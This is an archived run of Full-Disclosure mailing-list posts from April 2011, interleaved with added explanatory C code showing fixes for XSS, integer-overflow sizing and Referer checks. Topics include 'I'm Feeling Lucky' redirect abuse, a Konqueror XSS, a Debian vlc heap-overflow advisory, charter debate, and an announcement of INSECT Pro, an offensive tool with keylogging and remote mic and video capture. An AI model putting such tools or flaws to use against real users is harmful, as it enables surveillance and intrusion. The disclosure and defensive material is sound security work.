>> Thanks for that Nick , good to know , but unfortunately it's still 
>> exploitable in 2011 :)
>>
>> On Sun, Apr 10, 2011 at 2:31 AM, Nick FitzGerald  
>> wrote:
>>
>> satyam pujari wrote:
>>
>> > Here is a simple Google's "I'm Feeling Lucky" search feature exploitation
>> > scenario.
>>
>> > [...]
>>
>> Yawn...
>>
>> That's _so_ 2007!
>>
>>   http://www.virusbtn.com/resources/spammerscompendium/lucky.xml
>>
>> ...and I seriously doubt that was the first time it was done, just when
>> _I_ happened to make a note of it being actively abused in spam.
>>
>> All that other stuff about free hosting sites and IFrames on
>> blogger.com is unnecessary implementation detail that can be achieved
>> multitudinous ways.
>>
>>
>>
>> Regards,
>>
>> Nick FitzGerald
>>
>>
>
>



Re: [Full-disclosure] Google Search Feature Exploitation Scenario

2011-04-12 Thread satyam pujari
The question is, do we really need this feature? How many people really use
"I'm feeling Lucky"?
Can't Google implement something more 'useful' on the search home
page.. thoughts?

On Tue, Apr 12, 2011 at 5:52 PM, Nick FitzGerald
wrote:

> Leon Kaiser wrote:
>
> > I don't see why people are able to directly link to "I'm Feeling Lucky"
> > Google search results in the first place. Can anyone think of a
> > practical use for it?
>
> Putting a Referer check on "I'm Feeling Lucky" was suggested back
> in/around September 2007, but as it still works from anywhere, you can
> see how much Google-oids really take the company's "do not facilitate
> the less than desirable" to heart...
>
>
>
> Regards,
>
> Nick FitzGerald
>
>
>

[Full-disclosure] List Charter

2011-04-12 Thread John Cartwright

[Full-Disclosure] Mailing List Charter
John Cartwright 
 

- Introduction & Purpose -

This document serves as a charter for the [Full-Disclosure] mailing 
list hosted at lists.grok.org.uk.

The list was created on 9th July 2002 by Len Rose, and is primarily 
concerned with security issues and their discussion.  The list is 
administered by John Cartwright.

The Full-Disclosure list is hosted and sponsored by Secunia.


- Subscription Information -

Subscription/unsubscription may be performed via the HTTP interface 
located at http://lists.grok.org.uk/mailman/listinfo/full-disclosure.

Alternatively, commands may be emailed to 
full-disclosure-requ...@lists.grok.org.uk; send the word 'help' in 
either the message subject or body for details.

 
- Moderation & Management -

The [Full-Disclosure] list is unmoderated. Typically, posting will be
restricted to members only; however, the administrators may choose to 
accept submissions from non-members based on individual merit and 
relevance.

It is expected that the list will be largely self-policing; however, in
special circumstances (e.g. spamming, misappropriation) offending 
members may be removed from the list by the management.

An archive of postings is available at 
http://lists.grok.org.uk/pipermail/full-disclosure/.
 

- Acceptable Content -

Any information pertaining to vulnerabilities is acceptable, for 
instance announcement and discussion thereof, exploit techniques and 
code, related tools and papers, and other useful information.

Gratuitous advertisement, product placement, or self-promotion is 
forbidden.  Disagreements, flames, arguments, and off-topic discussion 
should be taken off-list wherever possible.

Humour is acceptable in moderation, providing it is inoffensive. 
Politics should be avoided at all costs.

Members are reminded that due to the open nature of the list, they 
should use discretion in executing any tools or code distributed via
this list.
 

- Posting Guidelines -

The primary language of this list is English. Members are expected to 
maintain a reasonable standard of netiquette when posting to the list. 

Quoting should not exceed that which is necessary to convey context; 
this is especially relevant to members subscribed to the digested 
version of the list.

The use of HTML is discouraged, but not forbidden. Signatures will 
preferably be short and to the point, and those containing 
'disclaimers' should be avoided where possible.

Attachments may be included if relevant or necessary (e.g. PGP or 
S/MIME signatures, proof-of-concept code, etc) but must not be active 
(in the case of a worm, for example) or malicious to the recipient.

Vacation messages should be carefully configured to avoid replying to 
list postings. Offenders will be excluded from the mailing list until 
the problem is corrected.

Members may post to the list by emailing 
full-disclosure@lists.grok.org.uk. Do not send subscription/
unsubscription mails to this address, use the -request address 
mentioned above.


- Charter Additions/Changes -

The list charter will be published at 
http://lists.grok.org.uk/full-disclosure-charter.html.

In addition, the charter will be posted monthly to the list by the 
management.

Alterations will be made after consultation with list members and a 
consensus has been reached.



Re: [Full-disclosure] Announcement posts and the charter (was Re: INSECT Pro 2.5.1 released)

2011-04-12 Thread Christopher Truncer
I agree with Steve. I joined this list for learning about the latest security 
vulnerabilities. It is a great method of staying current with everything going 
on in the IT Sec world. I think I can speak for some people saying we did not 
join to have a "free but donation required" tool promoted every 3 weeks.

On Apr 12, 2011, at 8:23 AM, Steven Pinkham  wrote:

> I agree this is a discussion worth having.  I think the policy should be
> more objective to give us a clear policy to abide by and enforce.
> 
> Suggestions for policy:
> 1)No tool announcements.
> Best rationale I can think of for this one: Tool announcements should go
> to the specific group they are for. Pentest, webappsec, etc are all
> better places for announcements.
> 
> 2)Only announcements for OSI approved projects.  Webappsec has this
> policy I think, and it rewards people who share the most openly.
> 
> 3)Announcements for only no-cost projects.  Similar to the above
> 
> 4)Announcements for initial and major feature releases only, with a
> limit of 1 announcement per x months(3,6,12- whatever we deem reasonable
> as an upper bound.  I think one of the lists has this policy, and it
> seems the most reasonable one to me.
> 
> Steve
> Pete Smith wrote:
>> John,
>> 
>> The following line is within the list charter: Alterations will be made
>> after consultation with list members and a consensus has been reached. 
>> 
>> I would like to suggest that advertising for products and tools (free or
>> otherwise) be limited to just an initial announcement to tell people
>> about the tool. 
>> Sending updates for every single minor update made is just useless spam
>> for the majority of people seeing it, the people who are interested in a
>> product beyond the initial announcement can and will keep up to date on
>> changes themselves.
>> 
>> http://lists.grok.org.uk/full-disclosure-charter.html
>> 
>> Cheers,
>> Pete
>> 
> 
> 
> -- 
> | Steven Pinkham, Security Consultant|
> | http://www.mavensecurity.com   |
> | GPG public key ID CD31CAFB |
> 
> 


Re: [Full-disclosure] Google Search Feature Exploitation Scenario

2011-04-12 Thread Cal Leeming
Didn't seem to work for me:

http://www.google.com/search?hl=en&q=easyratemortage+tax+deductible+mortgage+refinancing+strategy&btnI=AaEbK6r0Kz0r9JU4b

On Tue, Apr 12, 2011 at 4:05 AM, Leon Kaiser  wrote:

>  I don't see why people are able to directly link to "I'm Feeling Lucky"
> Google search results in the first place. Can anyone think of a practical
> use for it?
>
> 
> *Leon Kaiser*  - Head of GNAA Public Relations -
> litera...@gnaa.eu || litera...@goatse.fr
>http://gnaa.eu || http://security.goatse.fr
>   7BEECD8D FCBED526 F7960173 459111CE 
> F01F9923
> "The mask of anonymity is not intensely constructive."
>-- Andrew "weev" Auernheimer
> 
>
> On Sun, 2011-04-10 at 14:05 +0530, satyam pujari wrote:
>
> Thanks for that Nick, good to know, but unfortunately it's still
> exploitable in 2011 :)
>
> On Sun, Apr 10, 2011 at 2:31 AM, Nick FitzGerald <n...@virus-l.demon.co.uk> wrote:
>
> satyam pujari wrote:
>
> > Here is a simple Google's "I'm Feeling Lucky" search feature exploitation
> > scenario.
>
> > [...]
>
> Yawn...
>
> That's _so_ 2007!
>
> http://www.virusbtn.com/resources/spammerscompendium/lucky.xml
>
> ...and I seriously doubt that was the first time it was done, just when
> _I_ happened to make a note of it being actively abused in spam.
>
> All that other stuff about free hosting sites and IFrames on
> blogger.com is unnecessary implementation detail that can be achieved
> multitudinous ways.
>
>
>
> Regards,
>
> Nick FitzGerald
>
>

Re: [Full-disclosure] Medium severity flaw in Konqueror

2011-04-12 Thread Tim Brown
On Tuesday 12 April 2011 03:36:24 Vincent Danen wrote:
> * [2011-04-11 22:07:24 +0100] Tim Brown wrote:
> >I was recently taking a look at Konqueror and spotted an example of
> >universal XSS.  Essentially, the error page displayed when a requested
> >URL is not available includes said URL.  If said URL includes HTML
> >fragments these will be rendered.  CVE-2010-2952 has been assigned to
> >this issue.
> 
> Actually, CVE-2011-1168 was assigned to this issue as noted in the
> upstream advisory:
> 
> http://www.kde.org/info/security/advisory-20110411-1.txt

Hi Vincent,

You're quite right, not sure how the wrong CVE ended up in the email.  That's 
a different CVE for another of my advisories :/.

Tim
-- 
Tim Brown




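The defect Tim describes is the classic reflected XSS pattern: an error page that echoes the requested URL into HTML without encoding it, so any markup in the URL is parsed as part of the page. The C routine below is an added illustration written for this page; it is not Konqueror's or KDE's code, and the page template, the function names and the sample URL are constructed. It builds the error page both ways and checks that the escaped version no longer contains the raw tag.

```c
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

/* Append src to a fixed-size buffer without overflowing it.
 * Returns 0 on success, -1 if the output would not fit. */
static int append(char *out, size_t outsz, size_t *len, const char *src)
{
    size_t n = strlen(src);
    if (*len + n + 1 > outsz)
        return -1;
    memcpy(out + *len, src, n + 1);
    *len += n;
    return 0;
}

/* HTML-escape s into out: every character with meaning in HTML text or
 * double-quoted attribute context becomes its entity. Returns 0 or -1. */
int html_escape(const char *s, char *out, size_t outsz)
{
    size_t len = 0;
    out[0] = '\0';
    for (; *s; s++) {
        const char *rep;
        char one[2] = { *s, '\0' };
        switch (*s) {
        case '&':  rep = "&amp;";  break;
        case '<':  rep = "&lt;";   break;
        case '>':  rep = "&gt;";   break;
        case '"':  rep = "&quot;"; break;
        case '\'': rep = "&#39;";  break;
        default:   rep = one;      break;
        }
        if (append(out, outsz, &len, rep) != 0)
            return -1;
    }
    return 0;
}

/* Vulnerable pattern (constructed): the requested URL is spliced into the
 * page verbatim, so markup inside the URL is parsed as part of the error page. */
int build_error_page_unsafe(const char *url, char *out, size_t outsz)
{
    int n = snprintf(out, outsz, "<p>Could not load <b>%s</b></p>", url);
    return (n < 0 || (size_t)n >= outsz) ? -1 : 0;
}

/* Fixed pattern: escape first, then splice. */
int build_error_page_safe(const char *url, char *out, size_t outsz)
{
    char esc[1024];
    if (html_escape(url, esc, sizeof esc) != 0)
        return -1;
    int n = snprintf(out, outsz, "<p>Could not load <b>%s</b></p>", esc);
    return (n < 0 || (size_t)n >= outsz) ? -1 : 0;
}

/* 1 if the rendered page still contains the raw tag from the input, else 0. */
int page_contains_raw_tag(const char *page, const char *tag)
{
    return strstr(page, tag) != NULL;
}
```

html_escape covers HTML text and double-quoted attribute contexts; a URL placed into an href or into script needs that context's own encoding instead. The bounded append means an over-long URL makes the builder fail closed rather than truncate in the middle of an entity.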

[Full-disclosure] [SECURITY] [DSA 2218-1] vlc security update

2011-04-12 Thread Nico Golde
-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1

- -
Debian Security Advisory DSA-2218-1                   secur...@debian.org
http://www.debian.org/security/                                Nico Golde
April 12, 2011                         http://www.debian.org/security/faq
- -

Package: vlc
Vulnerability  : heap-based buffer overflow
Problem type   : local
Debian-specific: no
CVE ID : none yet

Aliz Hammond discovered that the MP4 decoder plugin of vlc, a multimedia
player and streamer, is vulnerable to a heap-based buffer overflow.
This has been introduced by a wrong data type being used for a size
calculation.  An attacker could use this flaw to trick a victim into
opening a specially crafted MP4 file and possibly execute arbitrary code
or crash the media player.


The oldstable distribution (lenny) is not affected by this problem.

For the stable distribution (squeeze), this problem has been fixed in
version 1.1.3-1squeeze5.

For the testing distribution (wheezy), this problem will be fixed soon.

For the unstable distribution (sid), this problem has been fixed in
version 1.1.8-3.


We recommend that you upgrade your vlc packages.

Further information about Debian Security Advisories, how to apply
these updates to your system and frequently asked questions can be
found at: http://www.debian.org/security/

Mailing list: debian-security-annou...@lists.debian.org

-BEGIN PGP SIGNATURE-
Version: GnuPG v1.4.10 (GNU/Linux)

iEYEARECAAYFAk2kQQgACgkQHYflSXNkfP9KhQCeIMouwisbaIRQji7lU1YTugpU
j1EAn2/iB3jEH4k2ns4c0AKXZgy8IgIn
=uVBg
-END PGP SIGNATURE-

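The advisory pins the overflow on a size calculation done in the wrong data type. The routine below is an added example constructed for this page, not VLC's MP4 demuxer and not the exact code path the DSA refers to: a table box whose header carries an entry count. The broken variant multiplies the count in 32-bit arithmetic, so a crafted count wraps the product (to zero in the test case) and the allocation ends up far smaller than the copy the count then drives; the fixed variant computes in size_t, rejects a count whose product would overflow, and rejects a count that exceeds the bytes actually present in the box. ENTRY_SIZE, the box layout and the function names are assumptions.

```c
#include <stdint.h>
#include <stdlib.h>
#include <string.h>

#define ENTRY_SIZE 12u   /* bytes per table entry in this constructed box format */

/* Broken variant: the byte count lives in a 32-bit int. A crafted entry_count
 * wraps the product, e.g. 0x40000000 * 12 == 3 * 2^32, which truncates to 0.
 * malloc(0) followed by a copy loop driven by entry_count overruns the heap. */
int32_t table_bytes_broken(uint32_t entry_count)
{
    return (int32_t)(entry_count * ENTRY_SIZE);   /* unsigned 32-bit wrap */
}

/* Fixed variant: size_t arithmetic guarded against overflow (the first check
 * matters on 32-bit targets), and the result is compared against the number
 * of bytes the container actually holds. */
int table_bytes_checked(uint32_t entry_count, size_t box_remaining, size_t *out)
{
    if (entry_count > SIZE_MAX / ENTRY_SIZE)
        return -1;                         /* product would not fit in size_t */
    size_t bytes = (size_t)entry_count * ENTRY_SIZE;
    if (bytes > box_remaining)
        return -1;                         /* header promises more entries than data */
    *out = bytes;
    return 0;
}

/* Parse a constructed table box: [u32 big-endian entry_count][entries...].
 * On success *entries_out receives a malloc'd copy and the entry count is
 * returned; -1 means the header is inconsistent with the box length. */
long parse_table(const uint8_t *box, size_t box_len, uint8_t **entries_out)
{
    if (box_len < 4)
        return -1;
    uint32_t count = ((uint32_t)box[0] << 24) | ((uint32_t)box[1] << 16) |
                     ((uint32_t)box[2] << 8)  |  (uint32_t)box[3];
    size_t bytes;
    if (table_bytes_checked(count, box_len - 4, &bytes) != 0)
        return -1;
    uint8_t *buf = malloc(bytes ? bytes : 1);
    if (buf == NULL)
        return -1;
    memcpy(buf, box + 4, bytes);           /* bounded by the check above */
    *entries_out = buf;
    return (long)count;
}
```

The point of the second check is that a correct type is not enough on its own: a count that multiplies cleanly can still be larger than the file, and the copy length has to be tied to the data that is actually there.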


Re: [Full-disclosure] Announcement posts and the charter (was Re: INSECT Pro 2.5.1 released)

2011-04-12 Thread phil
Just keep it simple: the post hit the non-acceptable content.

"Gratuitous advertisement, product placement, or self-promotion is forbidden."

My opinion, but if the product could be free, like it was, then I
don't mind seeing those kinds of posts, but for anything commercial FD
is not there for that.

-phil



Re: [Full-disclosure] Google Search Feature Exploitation Scenario

2011-04-12 Thread Nick FitzGerald
Leon Kaiser wrote:

> I don't see why people are able to directly link to "I'm Feeling Lucky"
> Google search results in the first place. Can anyone think of a
> practical use for it?

Putting a Referer check on "I'm Feeling Lucky" was suggested back 
in/around September 2007, but as it still works from anywhere, you can 
see how much Google-oids really take the company's "do not facilitate 
the less than desirable" to heart...



Regards,

Nick FitzGerald


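The mitigation Nick refers to is a Referer check: only honour the btnI redirect when the request was made from a page on Google's own domain. As an added example (not Google's code; the function names and the allowed domain are assumptions made for this page), the C routine below parses the host out of a Referer value and matches it on a label boundary, which is the detail such checks usually get wrong: a naive substring test passes "notgoogle.com" and "google.com.example.net". The check fails closed when the header is missing or unparsable.

```c
#include <ctype.h>
#include <string.h>

/* Copy the host component of an absolute http(s) URL into host, lower-cased.
 * Userinfo ("user@") and a port suffix are skipped. Returns 0 on success, -1
 * if the value is not an absolute http(s) URL or the host is malformed. */
int referer_host(const char *referer, char *host, size_t hostsz)
{
    const char *p;
    if (strncmp(referer, "http://", 7) == 0)
        p = referer + 7;
    else if (strncmp(referer, "https://", 8) == 0)
        p = referer + 8;
    else
        return -1;

    /* The authority ends at the first '/', '?' or '#'. */
    const char *end = p + strcspn(p, "/?#");
    const char *at = memchr(p, '@', (size_t)(end - p));
    if (at != NULL)
        p = at + 1;                        /* drop userinfo */

    size_t n = 0;
    for (; p < end && *p != ':'; p++) {    /* ':' starts the port */
        unsigned char c = (unsigned char)*p;
        if (!isalnum(c) && c != '.' && c != '-')
            return -1;                     /* not a DNS host name character */
        if (n + 1 >= hostsz)
            return -1;
        host[n++] = (char)tolower(c);
    }
    host[n] = '\0';
    return n > 0 ? 0 : -1;
}

/* 1 if the Referer host is allowed_domain itself or a subdomain of it.
 * The suffix must sit on a label boundary, so "notgoogle.com" and
 * "google.com.example.net" are rejected. A missing or unparsable header
 * fails closed (returns 0). */
int referer_allowed(const char *referer, const char *allowed_domain)
{
    char host[256];
    if (referer == NULL || referer_host(referer, host, sizeof host) != 0)
        return 0;
    size_t hl = strlen(host), al = strlen(allowed_domain);
    if (hl < al || strcmp(host + (hl - al), allowed_domain) != 0)
        return 0;
    return hl == al || host[hl - al - 1] == '.';
}
```

A check like this raises the cost of linking straight to the redirector, but Referer is client-supplied and routinely stripped by privacy settings, so it is a nuisance filter rather than an authorization control.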


[Full-disclosure] Announcement posts and the charter (was Re: INSECT Pro 2.5.1 released)

2011-04-12 Thread Steven Pinkham
I agree this is a discussion worth having.  I think the policy should be
more objective to give us a clear policy to abide by and enforce.

Suggestions for policy:
1)No tool announcements.
Best rationale I can think of for this one: Tool announcements should go
to the specific group they are for. Pentest, webappsec, etc are all
better places for announcements.

2)Only announcements for OSI approved projects.  Webappsec has this
policy I think, and it rewards people who share the most openly.

3)Announcements for only no-cost projects.  Similar to the above

4)Announcements for initial and major feature releases only, with a
limit of 1 announcement per x months(3,6,12- whatever we deem reasonable
as an upper bound.  I think one of the lists has this policy, and it
seems the most reasonable one to me.

Steve
Pete Smith wrote:
> John,
> 
> The following line is within the list charter: Alterations will be made
> after consultation with list members and a consensus has been reached. 
> 
> I would like to suggest that advertising for products and tools (free or
> otherwise) be limited to just an initial announcement to tell people
> about the tool. 
> Sending updates for every single minor update made is just useless spam
> for the majority of people seeing it, the people who are interested in a
> product beyond the initial announcement can and will keep up to date on
> changes themselves.
> 
> http://lists.grok.org.uk/full-disclosure-charter.html
> 
> Cheers,
> Pete
> 


-- 
 | Steven Pinkham, Security Consultant|
 | http://www.mavensecurity.com   |
 | GPG public key ID CD31CAFB |




Re: [Full-disclosure] Google Search Feature Exploitation Scenario

2011-04-12 Thread david.kl...@ipfocus.com.au
Bing?


--- Original Message ---
From: Leon Kaiser [mailto:litera...@gmail.com]
Sent: 4/12/2011 1:05:37 PM
To  : full-disclosure@lists.grok.org.uk
Cc  : 
Subject : RE: Re: [Full-disclosure] Google Search Feature Exploitation Scenario

 I don't see why people are able to directly link to "I'm Feeling Lucky"
Google search results in the first place. Can anyone think of a
practical use for it?


Leon Kaiser  - Head of GNAA Public Relations -
litera...@gnaa.eu || litera...@goatse.fr
http://gnaa.eu  ||  http://security.goatse.fr 
  7BEECD8D FCBED526 F7960173 459111CE F01F9923
"The mask of anonymity is not intensely constructive."
   -- Andrew "weev" Auernheimer
 

On Sun, 2011-04-10 at 14:05 +0530, satyam pujari wrote:

> Thanks for that Nick, good to know, but unfortunately it's still
> exploitable in 2011 :)
>
> On Sun, Apr 10, 2011 at 2:31 AM, Nick FitzGerald wrote:
>
> satyam pujari wrote:
>
> > Here is a simple Google's "I'm Feeling Lucky" search feature exploitation
> > scenario.
>
> > [...]
>
> Yawn...
>
> That's _so_ 2007!
>
> http://www.virusbtn.com/resources/spammerscompendium/lucky.xml
>
> ...and I seriously doubt that was the first time it was done, just when
> _I_ happened to make a note of it being actively abused in spam.
>
> All that other stuff about free hosting sites and IFrames on
> blogger.com is unnecessary implementation detail that can be achieved
> multitudinous ways.
>
> Regards,
>
> Nick FitzGerald
> 
> 


Re: [Full-disclosure] Google Search Feature Exploitation Scenario

2011-04-12 Thread Leon Kaiser
I don't see why people are able to directly link to "I'm Feeling Lucky"
Google search results in the first place. Can anyone think of a
practical use for it?


Leon Kaiser  - Head of GNAA Public Relations -
litera...@gnaa.eu || litera...@goatse.fr
   http://gnaa.eu || http://security.goatse.fr
  7BEECD8D FCBED526 F7960173 459111CE F01F9923
"The mask of anonymity is not intensely constructive."
   -- Andrew "weev" Auernheimer
 

On Sun, 2011-04-10 at 14:05 +0530, satyam pujari wrote:

> Thanks for that Nick, good to know, but unfortunately it's still
> exploitable in 2011 :)
>
> On Sun, Apr 10, 2011 at 2:31 AM, Nick FitzGerald wrote:
>
> satyam pujari wrote:
>
> > Here is a simple Google's "I'm Feeling Lucky" search feature exploitation
> > scenario.
>
> > [...]
>
> Yawn...
>
> That's _so_ 2007!
>
> http://www.virusbtn.com/resources/spammerscompendium/lucky.xml
>
> ...and I seriously doubt that was the first time it was done, just when
> _I_ happened to make a note of it being actively abused in spam.
>
> All that other stuff about free hosting sites and IFrames on
> blogger.com is unnecessary implementation detail that can be achieved
> multitudinous ways.
>
> Regards,
>
> Nick FitzGerald
> 
> 

Re: [Full-disclosure] INSECT Pro 2.5.1 released

2011-04-12 Thread Michal Zalewski
> I would like to suggest that advertising for products and tools (free or
> otherwise) be limited to just an initial announcement to tell people about
> the tool.

Meh. Most authors keep the volume of their announcements low, and only
highlight genuinely interesting updates. I think it's beneficial to
allow this.

Maybe highlighting the importance of these two qualities is the way to go?

/mz



Re: [Full-disclosure] INSECT Pro 2.5.1 released

2011-04-12 Thread Pete Smith
John,

The following line is within the list charter: Alterations will be made
after consultation with list members and a consensus has been reached.

I would like to suggest that advertising for products and tools (free or
otherwise) be limited to just an initial announcement to tell people about
the tool.
Sending updates for every single minor update made is just useless spam for
the majority of people seeing it, the people who are interested in a product
beyond the initial announcement can and will keep up to date on changes
themselves.

http://lists.grok.org.uk/full-disclosure-charter.html

Cheers,
Pete

On 12 April 2011 09:20, runlvl  wrote:

> INSECT Pro 2.5 new version is now accessible on Insecurity Research servers
>
> Get it now to enjoy the positive changes that this update brings,
> based directly on user feedback
>
> INSECT Pro is the ultimate resource to demonstrate the security—or
> vulnerability—of your network. INSECT goes beyond simply detecting
> vulnerabilities to safely exploiting them. 100 native exploits added.
>
> Version 2.5.1 includes:
> User friendly GUI improved
> Minimize to systray to work in background
> Remote Video recording
> Remote Mic recording
> Capture screenshots
> Metasploit ( modules - exploits ) support
> Keylogging feature
> Command line based control
> Web Scanner
> SQL Injection and HTTP fuzzer
> And more than 150+ native exploits
>
> Thanks to the core developers and everyone else who contributed.
>
> Get a copy now from: http://www.insecurityresearch.com
>
> Juan Sacco
> --
> _
> Insecurity Research - Security auditing and testing software
> Web: http://www.insecurityresearch.com
> Insect Pro 2.5.1 was released, stay tuned
>